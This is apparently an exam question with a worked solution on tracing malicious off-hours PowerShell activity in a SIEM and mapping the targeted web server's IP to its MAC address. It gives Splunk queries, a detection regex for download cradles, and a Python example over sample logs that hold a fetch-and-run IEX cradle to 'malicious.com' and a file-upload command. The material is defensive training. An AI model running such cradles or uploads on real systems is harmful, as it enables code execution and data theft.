Your enterprise SIEM system is configured to collect and analyze log data from various sources. Beginning at 12:00 AM on December 4, 2024, until 1:00 AM (Absolute), several instances of PowerShell are discovered executing malicious commands and accessing systems outside of their normal working hours.
What is the physical address of the web server that was targeted with malicious PowerShell commands?
Correct Answer:
See the solution in Explanation.
Explanation:
To determine the physical address of the targeted web server, follow these step-by-step instructions to analyze the logs in your SIEM. The goal is to identify the malicious PowerShell activity that targeted the web server during the specified window (12:00 AM to 1:00 AM on December 4, 2024), recover the server's IP address from that activity, and then map the IP address to the server's MAC (physical) address.
Step 1: Understand the Context
* Scenario: Your SIEM has detected suspicious PowerShell activity during off-hours (12:00 AM to 1:00 AM on December 4, 2024).
* Objective: Identify the physical (MAC) address of the web server targeted by the malicious PowerShell commands. The MAC address does not appear in PowerShell event logs; you first identify the server's IP address from the PowerShell and network logs, then resolve that IP to a MAC using ARP or DHCP data.
Step 2: Identify Relevant Log Sources
* Logs to investigate:
* PowerShell script block logs (Event ID 4104) for the content of the executed commands.
* Windows Security Event Logs for logon and access attempts outside working hours.
* Network traffic logs (firewall or IDS/IPS) to identify the connections PowerShell made, in particular the destination IP of the web server.
* Web server access logs for unusual requests arriving during the window.
SIEM Log Sources:
* Windows Event Logs (Sysmon/PowerShell)
* Firewall Logs
* IDS/IPS Alerts
* Web Server Logs (IIS, Apache)
Step 3: Use SIEM Filters to Isolate Relevant Events
* Time Frame Filter:
* Set the time range from 12:00 AM to 1:00 AM on December 4, 2024.
* Event ID Filter:
* Filter for Event ID 4104 (PowerShell script block logging). Event ID 4103 (module logging) and Sysmon Event ID 1 (process creation) add the parent process and full command line if you need them.
* Command Pattern:
* Look for suspicious commands such as the following, matching case-insensitively (PowerShell is case-insensitive and attackers vary case to evade simple string matches):
Invoke-WebRequest
Invoke-Expression (IEX)
New-Object Net.WebClient
* Process Name:
* Filter logs where the Process Name is powershell.exe (or pwsh.exe for PowerShell 7).
Example SIEM Query (Splunk-style syntax; field names follow the Splunk Add-on for Windows, so adjust them to your SIEM's schema):
index=windows_logs EventCode=4104 earliest="12/04/2024:00:00:00" latest="12/04/2024:01:00:00"
| search ScriptBlockText="*Invoke-WebRequest*" OR ScriptBlockText="*IEX*" OR ScriptBlockText="*Net.WebClient*"
| table _time, host, ScriptBlockText
Note that a 4104 event carries the host that ran the script and the script text, not a MAC address; the destination IP of the web server is usually visible inside the script text (for example in a -Uri argument) and is confirmed from the network logs in the next step.
Step 4: Correlate Events with Network Logs
* Once you have identified the PowerShell events, correlate them with the network traffic logs for the same window.
* Focus on:
* Source IP Address: the host on which the PowerShell commands ran.
* Destination IP Address: the targeted web server.
* Use the IP address of the web server to trace back its MAC address.
Example Network Log Query (same Splunk-style syntax; replace <Web_Server_IP> with the address found in Step 3):
index=network_logs DestinationIP="<Web_Server_IP>" earliest="12/04/2024:00:00:00" latest="12/04/2024:01:00:00"
| table _time, SourceIP, DestinationIP, MACAddress, Protocol, Port
A MAC address field is only populated when the logging device (firewall, switch or sensor) sits on the same Layer 2 segment as the web server; a device on the far side of a router records the gateway's MAC instead, which is why Step 6 confirms the mapping against ARP or DHCP data.
Step 5: Analyze the PowerShell Commands
* Investigate the nature of the commands:
* Data Exfiltration: using Invoke-WebRequest or Net.WebClient to send data to external IPs.
* Remote Code Execution: using IEX to run downloaded script content in memory.
* Cross-check the commands, URLs and IPs against known Indicators of Compromise (IOCs).
Step 6: Validate the Web Server's Physical Address
* Identify the MAC address corresponding to the targeted web server.
* Cross-reference with ARP tables or DHCP lease logs to confirm the mapping between the IP address and the MAC address.
Example ARP Command on Windows:
arp -a | findstr <Web_Server_IP>
arp -a only lists neighbours on the same subnet as the machine you run it on; from a different subnet the entry you see is the gateway's MAC, not the server's. Run it from a host on the web server's own segment, or use the DHCP server's lease records or the switch's MAC address table instead.
Step 7: Report the Findings
* Document the targeted server's IP address and MAC address.
* Summarize the malicious activity:
* Commands executed
* Time and duration
* Source and destination IPs
Example Finding (illustrative values; the actual answer comes from your own SIEM data):
Web Server IP: 192.168.1.50
Physical (MAC) Address: 00:1A:2B:3C:4D:5E
Time of Attack: 12:30 AM, December 4, 2024
PowerShell Command: Invoke-WebRequest -Uri "http://malicious.com/payload"
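The procedure in Steps 3 to 7, as an added worked example (not part of the original question or of any SIEM vendor's code): it filters constructed 4104 script-block events to the 12:00 AM to 1:00 AM window, flags the suspicious command patterns, correlates the flagged host with constructed firewall flow records to find the web server it hit, and resolves that server's IP to a MAC from a constructed DHCP lease table. All log records, hostnames, IPs and MACs below are sample data, and the field names (EventID, ScriptBlockText, SourceIP, DestinationIP) are assumptions rather than any particular SIEM's schema.

```python
"""Worked example of Steps 3 to 7 over constructed sample logs. Added here;
not code from the original page. Field names are assumptions."""
import re
from datetime import datetime

WINDOW_START = datetime(2024, 12, 4, 0, 0)
WINDOW_END = datetime(2024, 12, 4, 1, 0)

# Step 3 patterns. Case-insensitive because PowerShell is, and attackers mix
# case (iEx, invoke-webrequest) to slip past naive string matches.
SUSPICIOUS = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|Net\.WebClient|DownloadString",
    re.IGNORECASE,
)

# Constructed 4104/4103 records: a maintenance script outside the window,
# then the download cradle and the POST to the web server inside it.
POWERSHELL_EVENTS = [
    {"time": "2024-12-03T22:15:00", "EventID": 4104, "host": "WS-FINANCE-07",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Stopped'"},
    {"time": "2024-12-04T00:30:00", "EventID": 4104, "host": "WS-FINANCE-07",
     "ScriptBlockText": "iEx (New-Object Net.WebClient).DownloadString('http://malicious.com/payload')"},
    {"time": "2024-12-04T00:32:10", "EventID": 4104, "host": "WS-FINANCE-07",
     "ScriptBlockText": "Invoke-WebRequest -Uri http://192.168.1.50/upload.aspx -Method POST -InFile C:\\Temp\\dump.zip"},
    {"time": "2024-12-04T00:45:00", "EventID": 4103, "host": "WS-FINANCE-07",
     "ScriptBlockText": "Get-Process"},
]

# Constructed firewall flow records (source IP, destination IP, destination port).
NETWORK_FLOWS = [
    {"time": "2024-12-04T00:30:05", "SourceIP": "192.168.1.120", "DestinationIP": "203.0.113.10", "Port": 80},
    {"time": "2024-12-04T00:32:12", "SourceIP": "192.168.1.120", "DestinationIP": "192.168.1.50", "Port": 80},
    {"time": "2024-12-04T00:32:40", "SourceIP": "192.168.1.120", "DestinationIP": "192.168.1.50", "Port": 443},
    {"time": "2024-12-04T02:10:00", "SourceIP": "192.168.1.33", "DestinationIP": "192.168.1.50", "Port": 443},
]

# Constructed asset inventory, web-server list and DHCP leases (the Step 6 source).
HOST_IP = {"WS-FINANCE-07": "192.168.1.120", "WEB-01": "192.168.1.50"}
WEB_SERVERS = {"192.168.1.50"}
DHCP_LEASES = {"192.168.1.50": "00:1A:2B:3C:4D:5E", "192.168.1.120": "AA:BB:CC:00:11:22"}


def in_window(record, start=WINDOW_START, end=WINDOW_END):
    """Half-open time-range filter, the same check a SIEM earliest/latest applies."""
    return start <= datetime.fromisoformat(record["time"]) < end


def suspicious_script_blocks(events):
    """Step 3: 4104 events inside the window whose script block matches a pattern."""
    return [e for e in events
            if e["EventID"] == 4104 and in_window(e) and SUSPICIOUS.search(e["ScriptBlockText"])]


def targeted_web_servers(events, flows):
    """Step 4: flows in the window from a flagged host to any web server, keyed by server IP."""
    attacker_ips = {HOST_IP.get(e["host"]) for e in suspicious_script_blocks(events)}
    hits = {}
    for f in flows:
        if in_window(f) and f["SourceIP"] in attacker_ips and f["DestinationIP"] in WEB_SERVERS:
            hits.setdefault(f["DestinationIP"], []).append(f)
    return hits


def resolve_mac(ip, leases=DHCP_LEASES):
    """Step 6: IP -> MAC from the lease table. Returns None when there is no
    lease, so the report says 'unknown' instead of guessing an address."""
    return leases.get(ip)


def build_findings(events, flows):
    """Step 7: one report entry per targeted web server."""
    flagged = suspicious_script_blocks(events)
    return [{
        "web_server_ip": ip,
        "mac": resolve_mac(ip),
        "first_seen": min(f["time"] for f in fl),
        "source_ips": sorted({f["SourceIP"] for f in fl}),
        "commands": [e["ScriptBlockText"] for e in flagged],
    } for ip, fl in targeted_web_servers(events, flows).items()]


if __name__ == "__main__":
    for finding in build_findings(POWERSHELL_EVENTS, NETWORK_FLOWS):
        print(f"Web Server IP: {finding['web_server_ip']}")
        print(f"Physical (MAC) Address: {finding['mac'] or 'unknown (no lease or ARP entry)'}")
        print(f"First targeted: {finding['first_seen']} from {', '.join(finding['source_ips'])}")
        for cmd in finding["commands"]:
            print(f"PowerShell Command: {cmd}")
```

In a real investigation the two record lists would be the exported results of the Step 3 and Step 4 SIEM queries and the lease table would come from the DHCP server or the switch's MAC table; the logic is the same. The 4103 event and the 2:10 AM flow are included to show that the time and event-type filters drop them, and resolve_mac deliberately returns None for an unmapped IP rather than inventing an answer.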
Step 8: Take Immediate Actions
* Isolate the affected server.
* Block external IPs involved.
* Terminate malicious PowerShell processes.
* Conduct a forensic analysis of compromised systems.
Step 9: Strengthen Security Post-Incident
* Implement PowerShell Logging: enable script block logging and module logging (the "Turn on PowerShell Script Block Logging" and "Turn on Module Logging" Group Policy settings) and forward the events to the SIEM.
* Enhance Network Monitoring: set up alerts for unusual PowerShell activity, such as download cradles or connections from workstations to servers outside change windows.
* User Behavior Analytics (UBA): detect anomalous logon patterns outside working hours.